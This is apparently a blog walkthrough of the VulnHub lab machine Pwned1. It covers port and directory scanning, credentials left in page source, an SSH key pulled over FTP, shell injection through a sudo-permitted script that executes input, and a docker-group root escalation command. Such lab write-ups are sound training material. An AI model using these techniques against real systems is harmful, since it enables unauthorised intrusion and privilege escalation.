Today we’ll be taking a look at Pwned1, which is available from vulnhub here. It’s prety well made. Not really hard per say, but everything is laid out in a sort of logical fashion that’s fun to follow to its conclusion.

Initial scan:

Not shown: 65532 closed ports
Reason: 65532 resets
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDaQPyAx8qSGlWyyuL5xu/6lWdbWs6VArMlRC71wt11kYKMGUTuVmPvLAdSAL66haaz0DCvquZMOmeYNHvM7/OjfmkwlIt3Wv53q/23AODRwPGkpj00QCNH/Vqt6Aw94Afo3etyW9SU3vzLC2F3mS18cqXApmV90NIH3d6ayhsDP+aPuQFoFqEzDxzy2RkosueaEERECT0auT+pTIwRMCHBEVX98Srd8+ax1yhWITRTGOYXcdocx0m9tooFUEH/a1P3RK3gBzCL63ZejMN9YofBl8y+CwCt+0nBLg+PtNjjskD9CaBwxUmH0/UM24z9BQecPn3IFmm3+P5U0z1DQEhf
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDHWpwgF92XD4REIANL7X9lMcQSwcbhlNqwBvNi8l4SzQn5MjSzlBQzgcC7Kro57lCr0kImH+XdijG+r6lyps70=
|   256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHPgRt1LF33Ttn5DuGuJJpmgbMd2ofAkqEt6gTOQK+WW
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Uptime guess: 13.932 days (since Tue Mar 23 06:01:22 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Just to make a note, I originally ran through this machine and made some rough notes as well as saved some output from nmap and dirb, but I’ve created another instance to go back and grab screenshots/command output for this writeup, so you may notice differences in IP addresses. Anyway, the initial scan didn’t reveal much. I checked the ftp server first to see if we could log in as anonymous, but no such luck.

kali@kali:~$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
530 Permission denied.Login failed.

The homepage shows a message that it has been hacked, and the source has a nonsensical note that wasn’t much help, at least to me.

Hacked Homepage

<!-- I forgot to add this on last note
     You are pretty smart as i thought 
     so here i left it for you 
     She sings very well. l loved it  -->

As always, when we’re faced with few open ports and a webserver, start brute-forcing.

DIRB v2.22
By The Dark Raver

OUTPUT_FILE: pwned1_dirb.txt
START_TIME: Tue Apr  6 04:22:54 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:3065)
+ (CODE:200|SIZE:61)
+ (CODE:403|SIZE:278)

END_TIME: Tue Apr  6 04:29:58 2021

There’s a robots.txt file, so lets check that out.

# Group 1

User-agent: *
Allow: /nothing
Allow: /hidden_text

The /nothing directory lived up to its name.

nothing file

I don't know what I expected

The hidden_text directory had one file called secret.dic with the following contents.


Initially I started going through this list by hand, but then I remembered that I am in fact a programmer, and I should be automating this. We can save this output and then use dirb to check the list for us.

kali@kali:~/offsec_prv/pwned1$ dirb ./secret.dic 

DIRB v2.22    
By The Dark Raver

START_TIME: Sat Apr 10 19:30:34 2021
WORDLIST_FILES: ./secret.dic


GENERATED WORDS: 21                                                            

---- Scanning URL: ----
+ (CODE:301|SIZE:321)                                                                                                                         
END_TIME: Sat Apr 10 19:30:36 2021

The /pwned.vuln directory gets us to a login page with a message that it was easily bypassed. I initially suspected that we could use some basic SQL injection to bypass it, but gave up on that rather quickly after a couple of manual attempts didn’t seem to yield fruit. I took a look through the source, and found that there was some commented out code which appeared to have a username and password. These credentials didn’t work for the web login, but did allow access to the ftp service.

login page

kali@kali:~/offsec_prv/pwned1$ ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( ftpuser
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa
-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt
226 Directory send OK.

Checking the contents of note.txt

Wow you are here 

ariana won't happy about this note 

sorry ariana :( 

So, now we have a user name and a private key. With this, we can ssh into the box.

The first thing that we should always check is if we can run any sudo commands without a password. Ariana appears to be able to run a script called /home/ as selena.

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/
ariana@pwned:~$ cat /home/ 

echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name 
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

I’m not sure how this script is intended to work because it’s not invoking a command, it appears to just be executing our input. So, we can take advantage of that to run bash as selena.

Welcome to linux.messenger 


Enter username to send message : 

Enter message for  :/bin/bash

Sending message to  

It’s sort of a pain to run commands like this because the stderr redirect in the script means we can’t see error messages. I probably could’ve ran a reverse shell instead and maybe that would’ve been easier, but I’m lazy.

Anyway, now that we’re selena, what can we do? sudo -l prompts us for a password, so that’s no good. Checking the groups for selena, we notice something strange. Selena is in the docker group. After doing some research, I came across the following blog which explains how to use docker to achieve privilege escalation: docker privesc.

Sure enough, the following command gets us root access to the system.

docker run -it -v /:/mnt alpine chroot /mnt
root@7b671441aa38:/# ls
bin   core  etc   initrd.img      lib    lib64   lost+found  mnt  proc  run   srv  tmp  var      vmlinuz.old
boot  dev   home  initrd.img.old  lib32  libx32  media       opt  root  sbin  sys  usr  vmlinuz
root@7b671441aa38:/# whoami

So, that was pwned1. It seems like a really good beginner box, with the whole “already hacked” theme giving the VM creator an excuse to help guide you through the path to root. All in all, definitely worth your time if you want to get into pen testing and don’t know where to start.